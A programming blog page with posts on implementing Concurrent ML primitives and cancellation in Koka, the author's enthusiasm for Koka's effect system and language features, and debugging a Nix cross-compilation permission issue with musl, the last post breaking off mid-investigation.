GFX::Monk

Concurrent ML and Koka

2026-01-11T00:00:00+11:00

This post summarises some recent experiments and learnings around concurrency & Koka. There’s no immediate application yet, just a bunch of thoughts which might be interesting if you’re into concurrency, parallelism, or Koka. If you’ve never heard of Koka before that’s OK, you don’t really need any prior knowledge (but I wrote about it here).

Koka and concurrency:

There are a few active avenues of interest when it comes to Koka and concurrency.

First, there’s the async effect, currently implemented in the community stdlib. That effect allows a function to suspend execution and await the result of a callback, as well as the ability to execute multiple async operations concurrently. It’s basically an implementation of the async / await semantics in JS and many other languages, but as a library (rather than built into the compiler). Currently this only supports koka code compiled into the JS backend. Under the hood, an async operation is represented as a continuation function - when the operation is complete, that function is invoked and (from the perspective of the Koka code you write), the async code resumes from where it left off.

There’s also work going on to create libuv bindings for koka. There’s a fully-featured attempt in this community repo, as well as a more minimal version in koka itself with just the core scheduling primitives. This work allows execution of async koka code in compiled binaries (the C target).

Both of these are currently limited to single-thread concurrency1, i.e. concurrency-without-parallelism. This is nothing to sneeze at, it’s done well enough for NodeJS for more than a decade, and it’s a step up from many scripting languages which only support synchronous IO.

Koka and parallelism:

But at the same time, Koka has some great fundamentals when it comes to true parallelism (with multi-threading). The way to share mutable state is via a ref, which is already thread-safe. And Koka’s reference counting algorithm was designed to perform well for both single and multi-threaded environments.

All this is to say: single-threaded concurrency is cool and all, but there’s no technical reason Koka couldn’t support true parallel concurrency like Go, Rust, OCaml and Guile Scheme.

What’s Guile Scheme? Don’t ask me, I’ve never used it. but I think of it often when it comes to concurrency. Years ago, I read Andy Wingo’s excellent series on implementing Concurrent ML primitives in Guile Scheme. It’s stayed in the back of my mind as an interesting point in the concurrency design space, and seems to keep coming up as a lesser-known approach which ought to be more widely known and adopted. See also Concurrent ML has a branding problem, where the tl;dr is “Concurrent ML’s primitives are great but the terms used to describe it are confusing so people ignore it”.

Implementing CML primitives in Koka

Using Andy’s blog (and the guile fibers library) as a guide, I’ve been implementing CML primitives in Koka. I have a branch here if you’re curious, which works with the above libuv basics branch of Koka. I wouldn’t spend much time trying to read or understand it, but you can if you’re curious.

This has been a fun experiment, and I don’t expect it to go anywhere soon. But I’ve learnt some things from it, which I think are worth sharing.

Cancellation in asynchronous code

I care a lot about cancellation. To me, a language without robust support for cancellation of async operations is not a serious language. Any non-toy implementation of happy eyeballs(the “hello world of concurrency”) requires cancellation so that it doesn’t leak resources.

A while back I wrote a PR to make async cancellation first-class. The semantics here are based on Scala’s fs2, which I know fairly well.

But one problem which always bugs me is that if you’re waiting for the first of two operations, they might both happen. Say you’re waiting for input on two sockets:

val message = firstof(
	{ socket1.next-message() },
	{ socket2.next-message() }
)

When the first async branch completes, the second will be canceled, and cancellation hooks will run. But this isn’t atomic, and I don’t think it can be. If different messages arrive on socket1 and socket2, then they’ll both trigger completion of the overall async expression. Only one will win, and the other one will get canceled. But at that point it’s too late - we’ve already read the message off that channel and effectively discarded it.

In this case there are obviously ways around it, like feeding all messages from both sockets into a single channel and reading messages off that, or simply processing each socket in its own async loop.

Cancellation in CML (Concurrent ML)

Cancellation in CML seems much more elegant. In a CML select, there is a known set of operations which are awaiting completion, and only one will complete.

Specifically if you have two CML channels and you select over both of them, like so:

val message = select(
	channel-1.receive-op(),
	channel-2.receive-op()
)

Then it is guaranteed that only one message will be consumed. If messages arrive on channel-1 and channel-2 at the exact same time, they’ll race to commit these receive operations, and only one will succeed because the operations are both associated with a single opstate ref.

Whichever channel was not selected, the corresponding send-op will remain suspended and will not get lost, it’ll just wait around for another receive-op to pair with.

This is good. This feels like a proper system, as opposed to “a bunch of things that happen”.

It also seems efficient, as many of the operations handle cancellation for free (e.g. a channel send operation will naturally clean up cancelled receive operations as part of its execution logic).

Some CML operations don’t get cancellation for free, which somewhat blurs the line between a CML operation and an async evaluation. For example a timeout creates a runtime resource (a timer). If we don’t clean these up we may leak timers. They’d resolve to a harmless no-op so it’s not a correctness issue, but repeated use could result in a significant number of unwanted timers consuming resources.

What is this?

When dealing with a new concept, it can be helpful to explain it as “X but Y”. Having now implemented parts of CML, the simplest way I can describe a CML operation is:

a single async suspension (i.e. some code which will be resumed via a callback)
… with an opstate reference that’s shared among all operations in the current scope (i.e. all operations in a select())

This opstate is a reference which can have the values Waiting, Claimed and Done. Completing an operation involves atomically transitioning from Waiting -> Done, and there’s a half-committed Claimed state which serves as a transitory state when attempting to complete an operation in a way that may not succeed (i.e could transition back to Waiting).

CML ensures that only one among a set of possible operations succeeds, by sharing the same opstate among all alternative operations. If you select between two receive operations on two different channels, then only one can be completed - code attempting to complete the other will be racing to modify the same opstate, and fail.

Why doesn’t all async code have an opstate?

Now that I understand the key difference, it’s time to wonder why we don’t just do this all the time, if it’s so neat?

It turns out, using an opstate to select between alternatives is of limited use. In Koka, the async effect describes code which may suspend. Chaining together two async functions results in an async function, with an arbitrary number of suspension points.

e.g. the following code is async:`

val message1 = channel.receive()

But the following code is also async:

val message1 = channel.receive()
val message2 = channel.receive()

The second code composes two async operations into another async operation. It’s impossible to tell how many async suspensions might be involed. But an opstate represents a single operation. It’s either Waiting or it’s Done. If a piece of async code suspends at 3 different points, which one represents Done?

CML cannot compose operations

So if we want to use this approach for arbitrary async actions, we’d need to split them into individual operations, where each can suspend at most once, and the operation is Done when it resumes (or completes without suspending).

This is what CML does. It’s a little confusing, because CML is “composable” in that multiple operations can be composed into a single operation which chooses only one sub-operation (that’s the select operation). But this seems to be the only kind of composition possible, you can’t sequence CML operations into larger atomic operations.

Most operations don’t need to be atomic

Atomicity sounds great, but the more I’ve thought about it there’s quite a limited set of places where it matters. One is ovbiously channel receive operations, because taking a message from a channel only to have it go unused is clearly bad. And the same likely goes for channel send operations, although it’s less obvious when that would be a practical concern.

But… is that all? Maybe it is.

Many async operations either can’t be atomic, or don’t need to:

Remote interactions (like connecting to a server): it’s impossible for the counterpart to observe or respect the opstate, and typically you’ll dispose the entire connection if you abandon the code path that establishes a connection
Reading files / sockets: the read operation can’t easily “put the bytes back in the pipe” if the operation is already completed when they arrive.
To workaround this you can stream the contents into a channel, and read from that.
Timeouts: the counterparty to the operation (the clock) doesn’t care if the operation happens or not. When the configured time passes, it generates an event. If that event goes unused, it has no effect on the clock.

There may be some circular logic in here - the advice “if you need the operation to be atomic, use a channel” incidentally ensures that only channels need to support atomic operations. But still, I don’t think the majority of async operations benefit from atomic guarantees in practice.

… But atomic operations should be completable by non-atomic ones

One last thing to mention is that even though a timeout doesn’t need to be atomic, it’s important that it can participate in an atomic operation. That is, this should work:

val result: maybe<string> = select([
	channel.receive().map(Just),
	timeout(1.second).as(None)
])

If the channel receive happens to occur in parallel with the one-second timeout and the receive wins, then that’s fine, the timer won’t be offended. But if the timeout wins, we want the channel receive to not happen, so that we don’t lose a message sent to the channel.

So while only channel operations seem to need to be atomic, we do want arbitrary other async operations that we’ll select() over to be atomic-aware. If an atomic operation loses the race, we want to prevent its side effects from occurring.

What would this look like in Koka?

I wasn’t really sure where this experiment would take me when I started. How does the current async effect and the world of CML fit together, if at all? Should CML become the new basis for asynchronous code in Koka?

The answer is much narrower, which is kind of a relief. If we want to support atomic channel operations, they will need to be first class values, representing a single operation. And it should be possible to select between a combination of async expressions and channel operations.

// either an atomic operation or an arbitrary async code
type operation<a>
	AtomicOp(...) // an atomic channel operation
	AsyncOp(f: () -> async a) // wrapper for arbitrary async code

// Return the result of the first operation, canceling all others.
// AtomicOps in this list will occur atomically, but AsyncOps will not.
fun select(operations: list<operation<a>>): async a
	...

Unfortunately, there’s no way to have this function be useful and have straightforward semantics. We want to support async operations, but it will also be possible to apply a single atomic operation, with a function like: fun perform(operation: operation<a>): async a. Which means that we can’t stop someone from doing this:

select([
	channel-1.receive-op(), // AtomicOp
	{ perform(channel-2.receive-op()) }, // AsyncOp
	timeout(1.second),
])

This will mostly work, but with the subtle problem that the receive-op on channel-2 is non-transactional, now that it’s placed within an opaque async expression. And code that wishes to perform multiple channel operations in sequence can only be written as an AsyncOp, again removing the ability to operate atomically.

These are difficult and subtle distinctions to convey to a user, unfortunately. It’s not clear that the benefits would be worth the confusion.

Alternative design: enforce single operations

A more drastic approach would be to remove the ability to race/select() over arbitrary async code, and require that all select operations occur on only singular operations like “channel receive”, “timeout”, etc. Without digging in too deeply, I think this is what Guile does. You can’t define an operation which is “run this async code”, because in guile async code is initiated by spawning fibers. The operation you can select over is “join this fiber” (i.e await its completion), which is a singular operation. So instead of select(fn1, fn2, fn3) you would first start all 3 functions in their own fibers, and then select(fiber1.join, fiber2.join, fiber3.join).

Which actually does have the same problems as I outlined above. If you were to spawn a fiber which just received a single message from a channel, then racing that fiber’s join event with other atomic events would not execute the channel receive atomically. This seems like a less likely mistake to make by accident, because fibers are more tedious to use.

In addition to fibers being more tedious, they typically don’t play well with my other longstanding interest, Structured Concurrency. Koka already supports structured concurrency well, so I think encouraging a fibers-style API would be a big step backwards.

Summing up:

CML is interesting and elegant, and understanding how it works has given me some insights into atomic events in the face of parallel (threaded) concurrency. One day I hope Koka supports true parallel concurrency, at which point we’ll want something like CML’s approach for channels, at least. But exposing atomic cancellation semantics to the user while preserving ease-of-use for arbitrary compositions of async code will likely be a challenge.

I'm excited about Koka

2025-04-13T00:00:00+10:00

It’s been a while since I’ve been excited about a new programming language.

I’ve learnt and used a number of languages, either because of necessity or curiosity, but there’s only been a few languages in the past 20+ years where I’ve thought “this could be my new favourite language”.

For a long time Python was my preferred language for its simplicity, and then StratifiedJS for its powerful approach to asynchrony (and JS interop). Since then most of my interest has been in statically typed languages, particularly OCaml and Rust.

I’ve used plenty of other languages for my day job, and I consider myself lucky to have a day job where I’m mostly writing Scala - a really good mix of “powerful language” and “something I can get paid to write”. But I’m a big believer that there should be a language which is great for nearly everything I want to do, and none of those are it.

Koka?

So when I came across Koka recently and realised how strongly it aligns with the kinds of things I like in a language, I got pretty excited! Of course, it’s far too early to know if it will stay that way as the language and ecosystem (hopefully!) grow and become production-ready, but for now I’m very optimistic.

Where I’m coming from

Above I mentioned a few languages which I’ve been impressed with over the years. To give you an idea of what I like (and dislike), here’s a quick overview of my favourite languages and their downsides:

OCaml

I have a soft spot for OCaml - it’s like a dramatically more approachable Haskell. It has a great type system, simple and efficient runtime, and I appreciate the fast startup compared to VM languages.

Downsides: The syntax is hard to love. Lack of typeclasses or implicits means you’re forever specifying which map function to call (List, Array, Lwt, etc), so code tends to be verbose and hard to refactor. Composing the appropriate functions every time you want to log some arbitrary structure can be amazingly frustrating. Build tooling is pretty nice these days with dune, but package management with opam is still quite painful.

Rust

Rust is an absolutely brilliant language. If I were writing low-level OS code or performance-critical code, I’d use Rust, no question. The power-to-convenience ratio is amazing. Cargo is great.

Downsides: The convenience doesn’t necessarily extend to many FP idioms. Rust gives you the tools to do things right, but it can take a lot of work. Basically, Rust can do high-level things (like async) but it still forces a lot of low-level concerns to permeate your codebase, which you don’t want or need to care about if efficiency isn’t your number one priority.

Scala

Scala has a high quality, reliable and extensive FP ecosystem. You can do pretty much anything in Scala, and the language is powerful enough to implement all kinds of useful abstractions.

Downsides: it’s a broad, complex language which can be hard to teach and navigate. The JVM legacy makes it a poor fit for CLI applications - it’s fast to run, but slow to start. FP purity is a matter of diligence, it’s incredibly easy to violate expectations by invoking code that throws exceptions, uses mutation, blocks the thread etc. Also I hate dealing with sbt, but it’s too entrenched to make me seriously consider alternatives.

Koka: Functional Programming with algebraic effects

Koka is a functional programming language. It’s eager like OCaml, not lazy like Haskell. It uses reference counting instead of a Garbage Collector.

And the big ticket item: it is built around algebraic effects - “koka” is Japanese for “effect”. Rust spent most of its innovation tokens on ownership, Koka spends it on effects.

(I’m aware that OCaml 5 has dynamically typed algebraic effects, which are interesting but much less so than statically typed ones, to me at least)

Algebraic effects: power

Algebraic effects is a bit of an obtuse name, they’re best understood from a mechanical perspective as “resumable exceptions”. With exceptions you can throw an exception and have it propagate up the stack to the nearest catch statement. From there you can do some more code and then return or throw another exception.

Effects allow you to call some function that the effect defines, and have that propagate up the stack to the nearest handler. Like catch you can perform some code and then return, but there’s another option: you can resume the code that threw the exception, as if the throw were calling a function and receiving its result. But it’s not a function you have a (lexical) reference to, it’s a function which is resolved dynamically via the callstack.

Obviously for exceptions resuming is a terrible idea, but it’s extremely powerful for other types of control flow. The easiest to appreciate is async. A number of languages support async/await syntax which allows you to write synchronous-looking code with asynchronous runtime behaviour. Adding this to a compiler is a massive undertaking.

But adding async in Koka amounts to a few hundred lines of code, none of it in the compiler. Effects allow everyday library code to implement an async system which captures a continuation and hands that off to the underlying scheduler, while having the surface syntax unchanged from synchronous code. The only change is the addition of async to the set of effects a function requires.

Many languages do support async/await but lack support for related concepts like cancellation. I love that in Koka this (and many other interesting execution concepts) is a library concern which lends itself to experimentation and evolution, rather than something that can only be implemented as a huge modification to both the language and compiler.

Algebraic effects: usage

Effect types never apply to values, only to functions. fun foo(): io () means that foo returns unit, but requires the io effect in order to evaluate. There is no such thing as an io () value. When you call a function, you can only do so if the effect is available, and the result you get back is the value type.

An effect can be “available” in two ways. The most common way is that the caller also requires that effect. Just like in monadic programming, if you’ve got an IO<()> then you’ll also need to return an IO<_>. With effects you will only call an io () function from another io function.

An effect can also be available by handling it. io can only be handled by the runtime, but other effects can be handled in user code. e.g the exn effect represents the ability to throw exceptions:

fun inner(): exn ()
  throw("oh no!")

fun outer(): error<()>
  // handle `throw-exn` (fail) and `return` (succeed) for the `exn` effect
  with handler <exn> {
    final ctl throw-exn(e) { Error(e) }
    return(value) { Ok(()) }
  }
  inner()

The outer function does not need the exn effect, because it’s handled that effect for inner and turned it into an error type with Ok / Error variants. In practice you’d just use the try function to handle errors rather than writing an exn handler, this is just for illustration.

So far, that’s just monads with a different syntax. But the crucial part of effect types is how they compose - a function has a set of effects. So you might have foo(state: ref<global>): <exn,st<global>> (). That means foo can fail (exn), and it needs to read and write to the global heap (state is a mutable reference cell, reading or writing to it requires the corresponding read or write effect, and st is just an alias for read, write and alloc, for reading writing and creating refs).

In monad-land, this is where we might enter monad transformer territory, with a StateT IO maybe? Or an IOT State? I don’t know. But in Koka, it’s just two effects that we need. And there’s no need to wrap / unwrap the various layers of a monad to get at the “right” effect level, you simply call functions that require effects, and the result is a function requiring all the effects you depend on.

To illustrate the difference, here’s an example which combines state and errors in Haskell. I borrowed it from this article, because I have done a bit of Haskell but I still couldn’t write this myself:

type StoreM = StateT (Map String Int) (Either String)

note :: a -> Maybe b -> Either a b
note msg = maybe (Left msg) Right

save :: String -> Int -> StoreM ()
save k v = modify (Map.insert k v)

load :: String -> StoreM Int
load k = do
  store <- get
  lift $ note ("the key " ++ k ++ " is missing") (Map.lookup k store)

operation :: StoreM Int
operation = do
  save "x" 1
  save "x" 2
  save "y" 123
  x <- load "x"
  y <- load "y"
  save "z" (x + y)
  load "z"

operation and save are straightforward, but I wouldn’t be able to write load and note without reading a few docs first.

Here’s the equivalent Koka code which is pretty straightforward once you know Koka’s syntax:

alias stored = hash-map<string, int>
alias store = ref<global, hash-map<string, int>>

fun save(store: store, k: string, v: int): st<global> ()
  store.modify fn(s)
    s := s.insert(k, v)

fun load(store: store, k: string): <exn,read<global>> int
  match (!store).get(k)
    Just(v) -> v
    Nothing -> throw("the key " ++ k ++ " is missing")

fun operation(store: store): <exn,st<global>> int
  store.save("x", 1)
  store.save("x", 2)
  store.save("y", 123)
  val x = store.load("x")
  val y = store.load("y")
  store.save("z", x + y)
  store.load("z")

I think this is an absolutely wonderful improvement for readability and general understanding, as well as type inference. There’s simply so much less manual machinery to think about. And thinking of “the set of effects I require” feels quite natural.

There’s one odd thing here: it feels very OOP. This feels jarring because humans are pattern recognition machines, but it still is FP, and I believe it retains all the important benefits of FP. Speaking of…

Effects: no more referential transparency?

A quick refresher: referential transparency means you should be able to substitute an expression for a variable-holding-that-expression without changing semantics.

So in Scala, there’s no difference between these two pieces of code:

def foo(): IO[Unit] = ???

// foo happens twice
doItTwice(foo(), foo())

// foo still happens twice
val action: IO[Unit] = foo()
doItTwice(action, action)

In Koka, that’s not true (but it also wouldn’t type-check, so at least it’s not an accident waiting to happen). Calling foo() evaluates its effects, and gives you the result. If you want to defer that you can pass the unevaluated function doItTwice(foo, foo), or have val action be an anonymous lambda. You can use braces (suspenders!) to write a zero-argument lambda, so these two are equivalent:

val action1 = fn() foo()
val action2 = { foo() }

I’m not sure how this one sits with me. Some would say a language without referential transparency is not a “real” FP language. But I’m not sure how much it matters in practice. Maybe it is still referentially transparent, if you argue the difference between IO[T] and T is equivalent to the difference between () -> io T and T. If you alias IO<t> = () -> io T, that would be awful for ergonomics but would it count as referential transparency? Not sure.

Either way, I’m fine with this in practice since it’s responsible for much of the readability gains in effect-using code.

Other features

Beyond algebraic effects, Koka has a handful of other distinguishing features:

No Garbage Collector

I flip-flop between this being a minor detail and a huge deal. Koka uses reference counting which is technically garbage collection, but it doesn’t have the overheads and unpredictability associated with a tracing GC. It’s also technically possible to create cycles, but thanks to its FP and lack of general mutation, this is much less likely to be a problem in practice compared to e.g. Swift.

Koka’s reference counting uses some clever techniques to be competitive (in select benchmarks) with the best garbage collectors, while requiring much less runtime code and fewer decades of cutting-edge engineering investment.

Ultimately I’ve enjoyed how lean and embeddable Rust is, and Koka gives me the same vibes in a much higher level language. For performance sensitive use cases you’re more likely to want to embed Rust than Koka, but using WASM for frontend code is an embedding use case where Koka should be much nicer than Rust.

Dot selection

obj.function(value) is always syntactic sugar for function(obj, value). This gives a natural left-to-right flow of methods as in OOP, but without the complexity of juggling both instance methods functions. Some OOP languages have ways to add extension methods to classes they didn’t define, but in Koka that’s just writing a function which accepts the given type as its first argument.

This left-to-right ordering makes IDE support nicer, since writing the value first allows the suggestions to be narrowed down to functions that accept that type, similar to OOP methods.

It does mean that any functions which are generic in the first argument will always be a valid suggestion, which could be noisy. Scala has similar problems with extension methods you can call on any value, IDEs present these as low priority suggestions. Koka should be able to do the same (maybe it already does).

OCaml (and many others) have a similar chaining operator where you can write obj |> method(value) as syntactic sugar for method(value, obj). But that feels like an afterthought in OCaml which is used (and useful) inconsistently, whereas dot syntax is idiomatic and universal in Koka.

Qualified names and overloading

In OOP, the namespace of “possible function names” is per-class - different classes can use the same name without colliding. In FP, there are a lot of functions in one big shared namespace. If you have a map function, then either:

You need to qualify it everywhere, like OCaml’s List.map(...)
You need some system whereby the one and only map function does the right thing for any structure which supports the concept of “mapping”, like Haskell’s typeclasses

Koka has a novel approach: functions and variables can all have qualified names, like list/map and array/map. Both can be referred to as map, but you can explicitly use list/map if you need to disambiguate. But Koka also has support for overloading, where it’ll automatically pick the correct map function if there’s only one in scope which matches the argument types given. So if you call map(somelist, ...) that’s going to select list/map without you needing to disambiguate.

Modules can be used to disambiguate, so you often don’t need to define the function using a qualified name. If you write a function called map in the list module, it can be referred to as list/map.

This felt weird at first, but after a short time feels like a nice way to balance “one big namespace” with “simple function names”, without the complexity of Haskell’s typeclasses. The one downside is that errors can be a little tougher since if the call doesn’t match any function, you get all the possibilities listed. But you can (temporarily) disambiguate with the full name to get a more specific error message.

Implicit arguments

Koka supports implicit arguments which are resolved by a combination of both name and type, unlike Scala which only considers the type of an implicit argument. Here’s an example of an implicit in Scala:

object Foo {
  implicit val show: Show[Foo] = ???
}

def print[T](value: T)(implicit S: Show[T]) {
  println(s"Here is a ${S.show(value)}")
}

The equivalent in Koka would be:

fun foo/show(value: foo) { ... }

fun print<a>(value: a, ?show: (a) -> string) {
  println("Here is a " ++ show(value))
}

Because Scala’s implicit requires exactly one instance of a given type to be found, it adds extra ceremony (marking values as implicit) to avoid polluting the search space
There’s also a complex resolution process (e.g. companion objects of the type in question will be searched, even if they’re not in scope)

With Koka, implicits have to match the name and type. And all that’s searched is the lexical scope, there are no extra rules. Because of qualified names, it’s possible to have many functions called show. If there’s only one that accepts a foo type, then that’s the one it uses! If there’s multiple (or none), you’ll need to specify one explicitly.

This does increase the chances of implicitly resolving a value which happens to be in scope, but not intended for that purpose. But given that the name also needs to match, it doesn’t seem too likely in practice.

It can also mean that you need additional imports. E.g. currently the hash functions for various types are defined in std/data/hash, so you need to import that in order for those symbols to be available for hash-map functions. This is all part of the community stdlib right now, it’s likely these hash functions would be defined more centrally once they become part of the official stdlib.

Cohesion and simplicity

One of Koka’s principals is minimal-but-general. Many languages (especially those who are young and not burdened with decades of production use) claim similar things, so I was prepared to be underwhelmed. Lest we forget one of the most complex build tools ever created was originally called Simple Build Tool.

It probably didn’t help that the “language basics” section started by describing all the various syntactic sugars which make parts of the syntax optional in certain situations, giving many different ways to write the same thing. I think these are useful and important for the “general” part of koka’s goals, but it does stand in contrast to the “minimal” goal.

I hope things go well enough that we see how these goals pan out after decades of supporting production use cases, but right now I buy it.

The effects system is clearly more general than other languages which have bespoke support for async, exceptions, and other specialized control flow.

And the features it does have tend to work well together. a.map(...) would not be that useful if there could only be one function in scope called map, nor would it be useful to require an implicit show parameter if there could only be one such function in scope.

Qualified names allows a much broader namespace because names can overlap, and the type level constraints provide a pragmatic way to extract the right thing out of those overlapping definitions. I don’t know how often in practice this will be better or worse than the explicitness of objects and instance methods, but it’s clearly much simpler and uniform, which I appreciate. It’s also the simplest approach I’ve seen to resolve the “one big namespace for functions” constraint that all FP languages have.

Performance

I like the fact that Rust is so efficient, but Rust makes a lot of tradeoffs to get there. This is probably not the right tradeoff for me most of the time. To be honest, for the kinds of things I do Haskell and OCaml are perfectly fine performance-wise without bogging down logic with memory management concerns. In some cases I’m comparing performance to languages like ruby and python, where being “fast” is a comically low bar.

So while I don’t often need a high performance language, it feels nice to have that option. Koka’s creator has devoted a fair bit of research and effort into specific optimisations which can make (some) idiomatic FP code compile to a form which is competitive with C, which feels like a pretty good balance of “the compiler cares about this” but “I don’t have to constantly care about this”.

Koka: the hard parts

So far I’ve mostly been playing around with the effects side of Koka, since that’s the novel part I want to understand better. These are some issues I’ve run into so far:

You can’t refer to generic type parameters in the function body

When the compiler says my types are incorrect, I often like to annotate parts of them in order to close the gap between what I think and what the compiler thinks types are. In Koka, there seem to be a lot of situations where you can’t actually write a type down, which makes this hard.

I think the main cause for this is that type parameters in the function type are not bound in the function body. So this annotation (of val result) is incorrect:

fun singleton<a>(value: a): list<a>
  val result: list<a> = [value]
  result

The problem here is that a in the function signature can’t be referenced in the function body. So ascribing a type list<a> in the body of a function is syntactic sugar for forall<a> list<a>, i.e “a list of any type you like”, which obviously won’t compile. There doesn’t seem to be any advantage in not making a reference “the one from the function signature”, so I’m hoping this can change in the future.

Local variables interfere with dot selection

When there’s a bunch of functions called location, Koka uses overloading to figure out which one you mean based on the arguments you pass. So in foo.location which desugars to location(foo), that’ll pick the single location function whose argument types match - or fail if there isn’t exactly one.

The one issue I’ve found with this is when you also use some field’s name as a variable, e.g. val location = "...". A local variable in scope will always be used rather than looking for other overloads. That’s a good rule, but in this case it makes foo.location a type error - that desugars to location(foo) but location is a string!

In these cases you still can access the field by using a qualified name (e.g. foo.file/location), but that’s a bit ugly - I typically find a different name for my variable. Working around this isn’t hard, it’s understanding the error message which is the hard part. Especially when you’re working through a bunch of other errors and the code in question has no obvious connection to your change.

I don’t think this is problematic enough to change the language, but the compiler error could definitely be improved when foo.bar doesn’t typecheck to highlight that bar refers to a local variable.

Matching up effect types can be hard

This may be simply a learning curve thing, but I stumbled a lot when trying to get my effect type declarations to compile.

Part of this is the way that effect types combine. They are unordered like a set, but they’re not deduplicated like a set is (they’re referred to as a row rather than a set in the documentation).

For example, I thought this would work:

fun withLogging(action: () -> e a): <console|e> a
  println("Starting action!")
  action()

You can read this as accepting an action function of type e a (generic effect, generic return type). The resulting function returns the same type, but with the effect of <console|e>, read as “console plus whatever e is”.

That doesn’t work, because if e already included the console effect, you’d have an effect type <console,console,...>, which would require two levels of console handlers to be available.

The correct way to write this is by requiring the action to have a console effect:

fun withLogging(action: () -> <console|e> a): <console|e> a
  println("Starting action!")
  action()

This says that action has the console effect. Which really means action may have the console effect, since the compiler will allow effect widening (a function can always be evaluated with more handlers available than it needs, it just won’t use them).

This does make sense, but can be a bit tedious since you often end up repeating the set of effects for both the action and return type, if you’re annotating types explicitly.

I also really struggled making effect types align. Here’s an example:

val pending: ref<h, list<thunk>> = ref([])

Gave me the error:

inferred effect: <alloc<$h>|$e>
expected effect: <alloc<$h1>|_e1>

Understanding why $h (the “heap” parameter of a ref) is not equal to $h1 and $e not equal to _e1 is not an easy task when none of those names are present (or even valid?) in the code I wrote.

I think the h difference is another instance of not being able to refer to generic type parameters. And I believe the $e / _e1 thing fell out of that too, in that if you have a ref<h> then its corresponding allocation effect is alloc<h>, and since there was a difference in h it affected both the type and the effect. But it’s not obvious from the error message, and I have since started using ref<global> over ref<h> because it leads to fewer type errors. I haven’t yet figured out why it’s useful that refs can be associated with different “heaps”, since I believe there’s only one in an actual program.

Compiler bugs

It says “experimental” on the tin for good reason!

So far I’ve run into a few compiler bugs when using effects in nontrivial ways, where the compiler generates code that crashes. In some cases I can get code that works by changing my effect type annotations, so I suspect I’m just running into codegen bugs (rather than typechecking bugs).

In some other cases I’ve been unable to get code which both compiles and runs, which is a shame. But given the language has such solid roots in research, I’m hopeful these are just minor bugs rather than larger flaws.

Summary

So far there’s a lot to love, and not a lot to put me off. That’s already a pretty amazing feat - I’m a fussy guy.

Koka is explicitly not ready for mainstream use, it’s still an experimental language. I’m really impressed with that language, and I get the feeling the core isn’t likely to significantly change, but I wouldn’t be surprised if the stdlib went through a few overhauls, and there’s no package manager yet.

So I don’t expect I’ll be writing real code in Koka any time soon, but it’s been a long time since I’ve been this excited about a new language. I’m definitely going to keep playing with it, and I might start posting more content that goes into details of my experiments and what I’m learning.

Nix remains my superpower

2024-01-31T00:00:00+11:00

I’ve long considered fluency in Nix to be a superpower that pays off way more than you might imagine, if you haven’t experienced it yourself.

Sure, it helps with the obvious practical things you’d expect - my system setup is declarative, reproducible, and suffers from vanishingly few chaotic state-based issues that tend to plague less reproducible systems (like brew in particular).

There are plenty of downsides too - I run into nix-specific issues that my colleagues with more normal setups don’t suffer. Interactions with tools like bundler building native extensions can be frustrating at best.

Those are the unsurprising, surface level tradeoffs when using a good-but-novel package manager. The real superpower comes through the staggering amount of things which are not just possible, but downright straightforward due to the reliable, principled way that nix works. Here’s a good example from last week:

Do niche things, encounter niche bugs

Firstly, I’ve got this rust project which I build on MacOS, but which cross-compiles to arm & x86 for both Mac & Linux. Without nix, I think I got a cross-compiling toolchain working once in my life, and that was mostly thanks to colleagues who had sorted it all out before I got there.

So cross-compilation thing is impossible thing number one that nix makes practical (I’ve talked about this before). But then when it breaks, nix also makes it easy to diagnose, fix and reproduce. When I updated nixpkgs in this project, cross-compilation stopped working with this error, which has nothing to do with my code:

cannot read symbolic link '/nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3/lib/ld-musl-x86_64.so.1': Permission denied

And indeed, I can see that it lacks permissions:

$ ls -l /nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3/lib
ls: cannot read symbolic link '/nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3/lib/ld-musl-x86_64.so.1': Permission denied
total 3796
-r--r--r-- 1 root wheel    1000 Jan  1  1970 crti.o
-r--r--r-- 1 root wheel     776 Jan  1  1970 crtn.o
lrwx------ 1 root wheel       7 Jan  1  1970 ld-musl-x86_64.so.1
-r--r--r-- 1 root wheel 3016118 Jan  1  1970 libc.a
lrwxr-xr-x 1 root wheel       7 Jan  1  1970 libc.musl-x86_64.so.1 -> libc.so*
-r-xr-xr-x 1 root wheel  811384 Jan  1  1970 libc.so*
# ...

Note that ls prints an error while listing this directory, which is unusual. Looks like only root will be able to read that file, though all the other files have read access for all users.

I don’t know much about musl, and I don’t know why it would create a symlink that I can’t read. But nix gives me an amazingly useful toolkit for diagnosing and fixing these kinds of issues.

First, because there’s a 1:1 mapping between outputs and derivations (recipes), I can ask nix to tell me which derivation made this path:

$ nix-store --query --deriver '/nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3/lib/ld-musl-x86_64.so.1'
/nix/store/wv79kvgc5sdjxjqjbfi4sjhzd8s8fa47-musl-x86_64-unknown-linux-musl-1.2.3.drv

That’s the recipe for building the outputs I’m looking at, in a canonical, serialized format. I can drop into a shell with that derivation’s environment, i.e. all dependencies and environment variables set up:

$ nix-shell /nix/store/wv79kvgc5sdjxjqjbfi4sjhzd8s8fa47-musl-x86_64-unknown-linux-musl-1.2.3.drv
$ echo $src
/nix/store/agnzzn18q0xfk7n4ks884zx3vxaqdr2c-musl-1.2.3.tar.gz

Often when a derivation fails to build it’s useful to drop into its shell and try various commands to figure out a fix interactively. I can also pretty-print the derivation in JSON, using nix derivation show.

But first, I want to find where this derivation actually is in nixpkgs.

For maximum reproducibility, I check out nixpkgs at the git commit my project is pinned to, from the release-23.11 branch. Using guesses as well as some helpfully-unique strings in the derivation’s postInstall phase, I locate pkgs/os-specific/linux/musl/default.nix.

Now that I’ve oriented myself, it’s time to make a minimal reproduction. I’m not doing anything funky with musl, so it should be easy to reproduce outside my project’s rather large nix expression:

$ cat musltest.nix
with import /Users/tcuthbertson/dev/nix/nixpkgs {
  crossSystem.config = "x86_64-unknown-linux-musl";
};
musl

$ nix-build musltest.nix
/nix/store/fgkznmnz1swzp8ck75fa2zvj62pkjgvq-musl-x86_64-unknown-linux-musl-1.2.3

OK, it printed the exact same path (and didn’t need to build anything). We’ve reproduced the problematic nix expression in 4 lines, without any noise related to the real project.

Now I’d like to see the build output. I can ask nix to check the build (i.e. build it again):

$ nix-build --check musltest.nix
# lots of build output

Here we get a hint. The build output includes the problematic filename in a list of file installations:

